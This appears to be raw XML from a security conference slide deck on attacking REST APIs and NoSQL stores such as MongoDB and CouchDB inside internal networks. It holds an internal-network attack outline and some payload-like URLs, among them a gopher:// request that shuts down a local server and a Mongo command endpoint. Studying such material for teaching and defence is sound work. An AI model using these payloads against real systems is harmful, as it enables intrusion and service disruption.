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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId53"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="263" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="278" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="289" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="286" r:id="rId29"/>
    <p:sldId id="287" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="290" r:id="rId32"/>
    <p:sldId id="309" r:id="rId33"/>
    <p:sldId id="311" r:id="rId34"/>
    <p:sldId id="310" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="308" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="301" r:id="rId40"/>
    <p:sldId id="305" r:id="rId41"/>
    <p:sldId id="306" r:id="rId42"/>
    <p:sldId id="307" r:id="rId43"/>
    <p:sldId id="295" r:id="rId44"/>
    <p:sldId id="291" r:id="rId45"/>
    <p:sldId id="303" r:id="rId46"/>
    <p:sldId id="302" r:id="rId47"/>
    <p:sldId id="296" r:id="rId48"/>
    <p:sldId id="297" r:id="rId49"/>
    <p:sldId id="280" r:id="rId50"/>
    <p:sldId id="304" r:id="rId51"/>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3504" y="-10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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><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9282" cy="35076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65014" y="0"/>
            <a:ext cx="4029282" cy="350760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{71FF7A78-D6E4-4548-8207-EEF1AE9CE4A1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6658443"/>
            <a:ext cx="4029282" cy="35076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65014" y="6658443"/>
            <a:ext cx="4029282" cy="350760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{008DBB3F-1818-4BA3-9186-9D9AA831EB7C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25367868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00489912-A394-40DE-9DB1-36C39A9A6FCD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14</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57FE253B-2AD3-4D3F-AAA3-558FD77AC26C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4047099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Many REST API frameworks provide extensions that allow clients to pass arbitrary code to server to be executed as a part of the request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{57FE253B-2AD3-4D3F-AAA3-558FD77AC26C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2535684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Many REST API frameworks provide extensions that allow clients to pass arbitrary code to server to be executed as a part of the request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{57FE253B-2AD3-4D3F-AAA3-558FD77AC26C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2535684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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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0BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260488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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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0BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3664824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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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0BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1905993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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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0BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1453332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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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0BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4105137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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2330108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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3369441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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2630610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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578371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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3153388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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408831043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9BC9B9-7586-4F48-85B3-5E160E1E894E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13/02/14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40BCBA-536C-438F-9EA7-ADACBCC4F895}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2056866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host:por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host:port/status/cluster" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host:port/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host:port/versio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host:5984/_all_dbs" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host:port/_all_document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host:port/_all_db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host:port/_all_db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user:password@internalsvr.com/xxx"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MongoServer:27080%3C/To" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="gopher://localhost:8005/SHUTDOWN%0D%0A" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/2005/08/addressing"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vr.com:27080/test/_cmd"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RESTing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> On Your Laurels Will Get You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwned</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8051467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63000" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attacking An Internal Network (Old School)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="914400"/>
            <a:ext cx="3962400" cy="4876799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the application server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Figure out which systems are running on the internal network and target a data rich server.  (Port Scanning and Fingerprinting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install client protocol binaries to targeted system (in this case SAP client code) so you can connect to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Figure out the correct parameters to pass to the backend system by sniffing the network, reusing credentials, using default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and passwords, bypassing authentication, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="914400"/>
            <a:ext cx="4419600" cy="5486400"/>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 name="Flowchart: Terminator 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4494276" y="24399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AS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2590799"/>
            <a:ext cx="381000" cy="1"/>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35" name="Flowchart: Terminator 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="2439926"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Flowchart: Terminator 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4494276" y="5640323"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="5791197"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Flowchart: Terminator 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="5640324"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Flowchart: Terminator 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4497324" y="45735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AS4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="4724399"/>
            <a:ext cx="381000" cy="1"/>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Flowchart: Terminator 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5183124" y="4573526"/>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ERP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Flowchart: Terminator 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4494276" y="1373124"/>
            <a:ext cx="914400" cy="301752"/>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AS1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="1523998"/>
            <a:ext cx="381000" cy="1"/>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72" name="Flowchart: Terminator 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="1373125"/>
            <a:ext cx="914400" cy="301752"/>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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Flowchart: Terminator 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4494276" y="35067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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="Straight Arrow Connector 73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="3657599"/>
            <a:ext cx="381000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Flowchart: Terminator 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5295900" y="3390902"/>
            <a:ext cx="914400" cy="533400"/>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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Can 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="1828800"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Can 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627219" y="2499362"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Can 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627219" y="1159843"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Can 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="3185160"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Can 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="1066800"/>
            <a:ext cx="914400" cy="838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LDAP/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Can 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="3886200"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Left-Right Arrow Callout 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6175248" y="2089404"/>
            <a:ext cx="1216152" cy="4158996"/>
          </a:xfrm>
          <a:prstGeom prst="lef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EAI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="83" name="Straight Arrow Connector 82"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="1524000"/>
            <a:ext cx="384048" cy="1066802"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:prstDash val="dashDot"/>
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Can 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
